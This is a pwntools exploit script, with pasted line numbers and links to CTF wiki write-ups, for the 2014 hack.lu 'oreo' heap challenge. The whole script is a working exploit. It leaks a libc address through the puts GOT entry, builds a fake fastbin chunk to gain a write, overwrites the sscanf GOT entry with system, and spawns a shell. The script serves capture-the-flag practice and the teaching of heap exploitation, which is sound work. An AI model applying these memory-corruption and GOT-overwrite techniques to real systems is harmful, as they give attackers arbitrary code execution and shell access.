1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
| from pwn import *
p = process('./oreo')
elf = ELF("./oreo")
libc = ELF('./libc.so.6')
# context.log_level = 'debug'
def add(descrip, name):
p.sendline('1')
p.sendline(name)
p.sendline(descrip)
def show_rifle():
p.sendline('2')
p.recvuntil('===================================\n')
def order():
p.sendline('3')
def message(notice):
p.sendline('4')
p.sendline(notice)
#print 'step 1. leak libc base'
payload1 = 'a'*27+p32(elf.got['puts'])
add('a'*25,payload1)
show_rifle()
p.recvuntil('===================================\n')
p.recvuntil('Description: ')
puts_addr = u32(p.recvuntil('\n', drop=True)[:4])
log.success('puts_addr: '+hex(puts_addr))
libc_base = puts_addr - libc.symbols['puts']
system_addr = libc_base + libc.symbols['system']
binsh_addr = libc_base + next(libc.search('/bin/sh'))
log.success('system_addr: '+hex(system_addr))
log.success('binsh_addr: '+hex(binsh_addr))
#print 'step 2. free fake chunk at 0x0804A2A8'
num = 1
while num < 0x3f:
add('a'*25,'a'*27)
num += 1
payload2 = 'a'*27+p32(0x0804a2a8)
add('a'*25,payload2)
payload3 = '\x00'*0x20+p32(0x40)+p32(0x50)
message(payload3)
order()
p.recvuntil('Okay order submitted!\n')
#print 'step 3. get shell'
sscanf_got = elf.got['__isoc99_sscanf']
add(p32(sscanf_got),'a')
message(p32(system_addr))
p.sendline('/bin/sh\0')
p.interactive()
|
链接:https://ctf-wiki.github.io/ctf-wiki/pwn/linux/glibc-heap/fastbin_attack/#2014-hacklu-oreo
链接:https://norw1nd.github.io/2018/08/27/2014-hack-lu-oreo/
